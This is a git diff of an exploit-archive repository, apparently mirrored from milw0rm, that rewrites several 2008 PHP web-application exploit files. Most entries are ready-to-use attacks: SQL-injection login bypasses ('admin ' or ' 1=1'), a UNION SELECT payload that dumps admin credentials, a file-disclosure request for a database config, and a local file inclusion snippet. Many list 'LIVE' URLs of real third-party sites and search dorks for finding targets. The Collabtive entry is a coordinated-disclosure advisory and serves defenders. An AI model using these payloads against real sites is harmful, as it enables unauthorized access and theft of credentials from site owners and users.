+ #		    include_once("./themes/".$_GET[theme].".php"); 		// LFI
+ #		    }
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7066.txt b/platforms/php/webapps/7066.txt
index 79d8165e8..abe17b4b4 100755
--- a/platforms/php/webapps/7066.txt
+++ b/platforms/php/webapps/7066.txt
@@ -1,53 +1,53 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Zeeways Shaadi Clone v2.0 Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ Zeeways Shaadi Clone v2.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://zeeways.com/php-software/shaadiclone-v2.0-2.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 08.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[»] http://localhost/[path]/admin/home.php
-
-
-===[ LIVE ]===
-
-	[»] http://megashaadi.com/admin/home.php
-	[»] http://proposals.vinlak.com/admin/home.php
-	[»] http://gmatrimonial.com/admin/home.php
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-08]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Zeeways Shaadi Clone v2.0 Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ Zeeways Shaadi Clone v2.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://zeeways.com/php-software/shaadiclone-v2.0-2.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 08.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[»] http://localhost/[path]/admin/home.php
+
+
+===[ LIVE ]===
+
+	[»] http://megashaadi.com/admin/home.php
+	[»] http://proposals.vinlak.com/admin/home.php
+	[»] http://gmatrimonial.com/admin/home.php
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7068.txt b/platforms/php/webapps/7068.txt
index d68096fab..0b22f7422 100755
--- a/platforms/php/webapps/7068.txt
+++ b/platforms/php/webapps/7068.txt
@@ -1,67 +1,67 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                                                                                                           [!]
-***********************************************************************************************************************************************************
- +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                       [Mole Group Airline Ticket Script(Auth Bypass) SQL Injection Vulnerability ]                                          ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
-¦   Script   : http://www.mole-group.com                                                                  ¦       ¦                ![ ]!                  ¦
-¦   Download : http://www.mole-group.com/content/view/57/72/                                              ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-Bypass : ........
-
-Go To The Admin Panel.
-and Login with this information :
-
-username : admin ' or ' 1=1
-password : Cyber-Zone or any thing you want :)
-
-yeah bro you  loged in dont worry :)
-
-and this is a live demo :
-http://airline.mole-group.com/admin/
-
-EnjoY.
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-08]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                                                                                                           [!]
+***********************************************************************************************************************************************************
+ +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                       [Mole Group Airline Ticket Script(Auth Bypass) SQL Injection Vulnerability ]                                          ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
+¦   Script   : http://www.mole-group.com                                                                  ¦       ¦                ![ ]!                  ¦
+¦   Download : http://www.mole-group.com/content/view/57/72/                                              ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+Bypass : ........
+
+Go To The Admin Panel.
+and Login with this information :
+
+username : admin ' or ' 1=1
+password : Cyber-Zone or any thing you want :)
+
+yeah bro you  loged in dont worry :)
+
+and this is a live demo :
+http://airline.mole-group.com/admin/
+
+EnjoY.
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7070.txt b/platforms/php/webapps/7070.txt
index fc76d361f..0bfb31a1c 100755
--- a/platforms/php/webapps/7070.txt
+++ b/platforms/php/webapps/7070.txt
@@ -1,14 +1,14 @@
-==============================================================================
- Zeeways PHOTOVIDEOTUBE v1.1  Auth Bypass Vulnerability
-==============================================================================
- [»] Script  :          [ Zeeways PHOTOVIDEOTUBE v1.1  ]
- [»] Language:          [ PHP ]
- [»] Website :          [ http://zeeways.com/php-software/photovideotube-v1.1.html ]
-        [»] Discover:          [ Mountassif Moad  ]
-===[ XPL ]===
- [»] http://localhost/[path]/admin/home.php
-
-===[ LIVE ]===
- [»] http://www.photovideotube.com/admin//main.php
-
-# milw0rm.com [2008-11-08]
+==============================================================================
+ Zeeways PHOTOVIDEOTUBE v1.1  Auth Bypass Vulnerability
+==============================================================================
+ [»] Script  :          [ Zeeways PHOTOVIDEOTUBE v1.1  ]
+ [»] Language:          [ PHP ]
+ [»] Website :          [ http://zeeways.com/php-software/photovideotube-v1.1.html ]
+        [»] Discover:          [ Mountassif Moad  ]
+===[ XPL ]===
+ [»] http://localhost/[path]/admin/home.php
+
+===[ LIVE ]===
+ [»] http://www.photovideotube.com/admin//main.php
+
+# milw0rm.com [2008-11-08]
diff --git a/platforms/php/webapps/7071.txt b/platforms/php/webapps/7071.txt
index d42a73c6a..0aa399d90 100755
--- a/platforms/php/webapps/7071.txt
+++ b/platforms/php/webapps/7071.txt
@@ -1,67 +1,67 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                                                                                                           [!]
-***********************************************************************************************************************************************************
- +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                       [ExoPHPDesk v1.2 Final(Auth Bypass) SQL Injection Vulnerability]                                                ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
-¦   Script   : http://exocrew.com                                                                         ¦       ¦                ![ ]!                  ¦
-¦   Download : http://exocrew.com/help_demo                                                               ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-Bypass : ........
-
-Go To The Admin Panel.
-and Login with this information :
-
-username : admin ' or ' 1=1
-password : Cyber-Zone or any thing you want
-
-yeah bro you  loged in dont worry :)
-
-and this is a live demo :
-http://exocrew.com/help_demo/admin.php
-
-EnjoY.
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-09]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                                                                                                           [!]
+***********************************************************************************************************************************************************
+ +----                                                       Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                       [ExoPHPDesk v1.2 Final(Auth Bypass) SQL Injection Vulnerability]                                                ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
+¦   Script   : http://exocrew.com                                                                         ¦       ¦                ![ ]!                  ¦
+¦   Download : http://exocrew.com/help_demo                                                               ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+Bypass : ........
+
+Go To The Admin Panel.
+and Login with this information :
+
+username : admin ' or ' 1=1
+password : Cyber-Zone or any thing you want
+
+yeah bro you  loged in dont worry :)
+
+and this is a live demo :
+http://exocrew.com/help_demo/admin.php
+
+EnjoY.
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-09]
diff --git a/platforms/php/webapps/7072.txt b/platforms/php/webapps/7072.txt
index ee57007c1..f733cf38c 100755
--- a/platforms/php/webapps/7072.txt
+++ b/platforms/php/webapps/7072.txt
@@ -1,51 +1,51 @@
-|___________________________________________________|
-|
-| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home : www.IQ-TY.com & www.TrYaG.cc
-|
-|    email: darkangeL_G85@Yahoo.COM
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script: http://zeeways.com/php-software/zeematri-v3.0.html
-|
-| Dork: "Powered by ZeeMatri"
-|
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-
-___________________
-
-
-Admin  LogiN :
-
-www.[target].com/Script/admin/
-
-# milw0rm.com [2008-11-09]
+|___________________________________________________|
+|
+| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home : www.IQ-TY.com & www.TrYaG.cc
+|
+|    email: darkangeL_G85@Yahoo.COM
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script: http://zeeways.com/php-software/zeematri-v3.0.html
+|
+| Dork: "Powered by ZeeMatri"
+|
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+
+___________________
+
+
+Admin  LogiN :
+
+www.[target].com/Script/admin/
+
+# milw0rm.com [2008-11-09]
diff --git a/platforms/php/webapps/7074.txt b/platforms/php/webapps/7074.txt
index 20ec53ee6..ecc2d6b75 100755
--- a/platforms/php/webapps/7074.txt
+++ b/platforms/php/webapps/7074.txt
@@ -1,46 +1,46 @@
-################# ~THUNDER ################################################################
-
-
-    ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability
-
-    ~Founded by : THUNDER 
-    ~Dork: "This search engine is in no way intended for illegal downloads. "
-    ~File : Download.php
-
-===========================================================================================
-
-to read files you need to encode the url, so you can use this php code :
-
-
-How to use : http://127.0.0.1/encode.php?t=[Url]
-Ex : http://127.0.0.1/encode.php?t=includes/constants.php
- 
-##### ~Exploit ############################################################################
-
-
-   http://www.target.com/[path]/download.php?url=[Encoded url]
-
-Example :
-let's download the constants.php file wich contains the database login and password .
-the file will be downloaded as .mp3 exstension .
-
-http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870
-
-Open the downloaded file with any text editor... ,and you got the database .           
-          
-
-
-###########################################################################################
-
-# milw0rm.com [2008-11-09]
+################# ~THUNDER ################################################################
+
+
+    ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability
+
+    ~Founded by : THUNDER 
+    ~Dork: "This search engine is in no way intended for illegal downloads. "
+    ~File : Download.php
+
+===========================================================================================
+
+to read files you need to encode the url, so you can use this php code :
+
+
+How to use : http://127.0.0.1/encode.php?t=[Url]
+Ex : http://127.0.0.1/encode.php?t=includes/constants.php
+ 
+##### ~Exploit ############################################################################
+
+
+   http://www.target.com/[path]/download.php?url=[Encoded url]
+
+Example :
+let's download the constants.php file wich contains the database login and password .
+the file will be downloaded as .mp3 exstension .
+
+http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870
+
+Open the downloaded file with any text editor... ,and you got the database .           
+          
+
+
+###########################################################################################
+
+# milw0rm.com [2008-11-09]
diff --git a/platforms/php/webapps/7076.txt b/platforms/php/webapps/7076.txt
index 4f1a47453..519024850 100755
--- a/platforms/php/webapps/7076.txt
+++ b/platforms/php/webapps/7076.txt
@@ -1,174 +1,174 @@
-Collabtive 0.4.8 Multiple Vulnerabilities
-
- Name              Multiple Vulnerabilities in Collabtive
- Systems Affected  Collabtive 0.4.8 and possibly earlier versions
- Severity          High
- Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
- Vendor            http://collabtive.o-dyn.de/
- Advisory          http://www.ush.it/team/ush/hack-collabtive048/adv.txt
- Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
-                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
-                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT
-                   digitalbullets DOT org)
- Date              20080925
-
-I. BACKGROUND
-
->From the Collabtive web site: "Collabtive is collaborative software to
-get your projects done!".
-
-II. DESCRIPTION
-
-Multiple vulnerabilities exist in Collabtive software.
-
-III. ANALYSIS
-
-Summary:
-
- A) Stored Cross Site Scripting
- B) Forceful browsing authentication bypass
- C) Arbitrary file upload
-
-A) Stored Cross Site Scripting
-
-A stored XSS vulnerability exists in the "/admin.php?action=projects"
-section.
-
-Once the attacker specifies an XSS attack vector, like
-"", as the "Name" property of a project then
-an XSS vulnerability occurs because the projects "Name" fields are
-stored and printed without any filtering.
-
-While the cited section poses limits on the "Name" field when
-reflecting the XSS payload, clicking on the edit link
-"/manageproject.php?action=editform&id=" results in a page
-without limitations on the characters showed thus allowing complete
-exploitation.
-
-This vulnerability requires administrator authentication.
-
-CSRF+XSS and timing (JS) can be used to successfully exploit this
-vulnerability in an automated manner.
-
-B) Forceful browsing authentication bypass
-
-An authentication bypass vulnerability exists in
-"/admin.php?action=users&mode=added". Directly pointing to that URL
-shows an error, however at the bottom of the page there is a web
-form that permits to create new users with full privileges.
-
-With this vulnerability an attacker without any valid credentials can
-create a new valid administrator.
-
-Since this vulnerability has been discovered the exploitation
-prerequisites changed as detailed below:
-
-- A bug fix in the latest version 0.4.8 now requires "globals on" in
-order to exploit this vulnerability.
-
-- In version 0.4.6 instead the vulnerability is exploitable regardless
-the "globals" settings.
-
-C) Arbitrary file upload
-
-It's possible to upload arbitrary files with arbitrary extensions.
-An attacker that has not already gained Administration privileges using
-the previously exposed vulnerabilities must be assigned to at least one
-project.
-
-To upload a file go to "/managefile.php?action=showproject&id="
-and add a new file.
-
-If a file with .php extension is uploaded then the mimetype will be
-"php/plain" and the program will change the extension to .txt in order
-to prevent exploitation.
-
-This security control can be bypassed changing the mimetype to
-text/plain, in this way the application will believe that a normal .txt
-file was uploaded and the extension will not be changed.
-
-The uploaded file resides in "/files//_$seed.php".
-
-An authenticated attacker will simply see the seed (and the complete
-filename) using the web interface and can directly execute it.
-
-In case of unauthenticated attackers the filename must be guessed.
-Luckily the make_seed() routine leaks real random proprieties and is
-only based on the time. $seed can be easily bruteforced using values
-that are likely to match the return derived by the microtime() of the
-upload.
-
-private function make_seed()
-{
-    list($usec, $sec) = explode(' ', microtime());
-    $value = (float) $sec + ((float) $usec * 100000);
-    return $value;
-}
-
-As easily understandable $seed can be guessed in really few tries. The
-same vulnerability exists when attaching a file in the "Messages"
-section.
-
-This vulnerability can also be exploited via CSRF.
-
-IV. DETECTION
-
-Collabtive 0.4.8 and possibly earlier versions are vulnerable.
-
-V. WORKAROUND
-
-Proper input validation will fix the vulnerabilities.
-
-VI. VENDOR RESPONSE
-
-No fix available.
-
-VII. CVE INFORMATION
-
-No CVE at this time.
-
-VIII. DISCLOSURE TIMELINE
-
-20080926 Initial vendor contact (No Response)
-20081003 Second vendor contact (No Response)
-20081010 Third vendor contact
-20081010 Vendor response (Fix promised for the end of October)
-20081010 Vendor contact to sync disclosure time (No response)
-20081110 Advisory released (Fix not available)
-
-IX. CREDIT
-
-Antonio "s4tan" Parata, Francesco "ascii" Ongaro and
-Giovanni "evilaliv3" Pellerano are credited with the discovery of this
-vulnerability.
-
-Antonio "s4tan" Parata
-web site: http://www.ictsc.it/
-mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it
-
-Francesco "ascii" Ongaro
-web site: http://www.ush.it/
-mail: ascii AT ush DOT it
-
-Giovanni "evilaliv3" Pellerano
-mail: evilaliv3 AT digitalbullets DOT org
-
-X. LEGAL NOTICES
-
-Copyright (c) 2008 Francesco "ascii" Ongaro
-
-Permission is granted for the redistribution of this alert
-electronically. It may not be edited in any way without mine express
-written consent. If you wish to reprint the whole or any
-part of this alert in any other medium other than electronically,
-please email me for permission.
-
-Disclaimer: The information in the advisory is believed to be accurate
-at the time of publishing based on currently available information. Use
-of the information constitutes acceptance for use in an AS IS condition.
-There are no warranties with regard to this information. Neither the
-author nor the publisher accepts any liability for any direct, indirect,
-or consequential loss or damage arising from use of, or reliance on,
-this information.
-
-# milw0rm.com [2008-11-10]
+Collabtive 0.4.8 Multiple Vulnerabilities
+
+ Name              Multiple Vulnerabilities in Collabtive
+ Systems Affected  Collabtive 0.4.8 and possibly earlier versions
+ Severity          High
+ Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
+ Vendor            http://collabtive.o-dyn.de/
+ Advisory          http://www.ush.it/team/ush/hack-collabtive048/adv.txt
+ Authors           Antonio "s4tan" Parata (s4tan AT ush DOT it)
+                   Francesco "ascii" Ongaro (ascii AT ush DOT it)
+                   Giovanni "evilaliv3" Pellerano (evilaliv3 AT
+                   digitalbullets DOT org)
+ Date              20080925
+
+I. BACKGROUND
+
+>From the Collabtive web site: "Collabtive is collaborative software to
+get your projects done!".
+
+II. DESCRIPTION
+
+Multiple vulnerabilities exist in Collabtive software.
+
+III. ANALYSIS
+
+Summary:
+
+ A) Stored Cross Site Scripting
+ B) Forceful browsing authentication bypass
+ C) Arbitrary file upload
+
+A) Stored Cross Site Scripting
+
+A stored XSS vulnerability exists in the "/admin.php?action=projects"
+section.
+
+Once the attacker specifies an XSS attack vector, like
+"", as the "Name" property of a project then
+an XSS vulnerability occurs because the projects "Name" fields are
+stored and printed without any filtering.
+
+While the cited section poses limits on the "Name" field when
+reflecting the XSS payload, clicking on the edit link
+"/manageproject.php?action=editform&id=" results in a page
+without limitations on the characters showed thus allowing complete
+exploitation.
+
+This vulnerability requires administrator authentication.
+
